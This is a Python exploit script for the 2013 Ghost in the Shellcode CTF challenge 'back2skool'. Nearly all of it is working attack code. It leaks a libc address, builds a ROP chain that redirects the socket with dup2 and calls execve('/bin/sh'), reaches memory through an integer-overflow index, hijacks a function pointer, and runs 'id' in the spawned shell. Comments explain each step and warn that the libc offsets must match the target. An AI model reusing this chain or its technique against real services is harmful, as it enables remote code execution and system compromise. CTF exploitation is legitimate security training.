Gits2013 Pwnable 250 "back2skool" exploit code. Important: every libc offset hard-coded in this script (the recv() leak offset, dup2, execve and the two gadgets) is for one specific libc build — you must recover the offsets for the target's own libc, otherwise the exploit will not work.
import socket,sys,time,re | |
""" | |
$python skool.py | |
libc_base : 0x840000 | |
shell_base : 0x804c11c | |
Exploit... | |
uid=1003(back2skool) gid=1003(back2skool) | |
""" | |
def readPos(index): | |
sk.send("read\n");sk.recv(10240) | |
sk.send("%d\n"%index) | |
match = re.findall("(\d+)",sk.recv(10240))[1] | |
return hex(int(match)) | |
def writePos(index, value):
    """Store *value* (sent as a decimal) into slot *index* via the ``write`` command.

    Uses the module-level socket ``sk``. The index is transmitted as
    ``-2147483648 + index`` (INT_MIN + index) rather than ``index`` itself; that
    large negative number is what makes the service accept the write — the exact
    check it gets past is not visible here (NOTE(review): confirm against the
    binary's index validation). Each prompt is drained with recv() after the send.
    """
    wrapped_index = index - 2147483648
    for line in ("write\n", "%d\n" % wrapped_index, "%d\n" % value):
        sk.send(line)
        sk.recv(10240)
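sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.connect(("mylab.local", 31337))
try:
    time.sleep(1)
    sk.recv(10240)                        # banner
    sk.send("func1\n"); sk.recv(10240)    # enter the menu that offers read/write

    eip = 14                  # slot whose pointer is hijacked below (presumably what "math" calls — confirm)
    base_addr = 0x0804c040    # address of slot 0; slots are 4-byte words (see shell below)

    # Leak a libc pointer from slot -32 and subtract that pointer's offset inside
    # libc (recv, per the original note) to recover the mapping base. Every
    # offset in this block is for ONE particular libc build; see the header note.
    libc_base = int(readPos(-32), 16) - 0x00d4630
    if libc_base & 0xfff:
        # libc is always mapped page-aligned, so a misaligned base means the leak
        # offset (and hence every gadget address below) is wrong for this target.
        # Abort before corrupting the remote process with bogus addresses.
        sys.stdout.write("bad libc_base %s - fix the libc offsets first\n" % hex(libc_base))
        sys.exit(1)
    xchg_sp_ax = libc_base + 0x0005a5a0   # stack-pivot gadget (name suggests xchg esp,eax)
    dup2 = libc_base + 0x00c40a0
    execve = libc_base + 0x009d6d0
    pop2ret = libc_base + 0x000772b7      # pop; pop; ret — discards the two dup2 args
    shell = base_addr + (4 * 55)          # address of slot 55, where "/bin/sh" is written
    sys.stdout.write("libc_base : %s\n" % hex(libc_base))
    sys.stdout.write("shell_base : %s\n" % hex(shell))

    # ROP chain in slots 0..12: dup2(4, 0); dup2(4, 1); execve(shell, 0, 0).
    # fd 4 is presumably the server-side client socket — confirm for the target.
    # 0x11223344 is execve's (never used) return address.
    chain = [
        dup2, pop2ret, 4, 0,
        dup2, pop2ret, 4, 1,
        execve, 0x11223344, shell, 0, 0,
    ]
    for slot, word in enumerate(chain):
        writePos(slot, word)
    writePos(55, 0x6E69622f)   # "/bin" as a little-endian word
    writePos(56, 0x0068732f)   # "/sh\0"

    sys.stdout.write("Exploit...\n")
    writePos(eip, xchg_sp_ax)  # hijack the pointer; the pivot lands esp on the chain
    sk.send("math\n")          # triggers the call through the hijacked slot
    sk.send("id\n")            # first command for the spawned shell
    sys.stdout.write(sk.recv(10240) + "\n")
finally:
    sk.close()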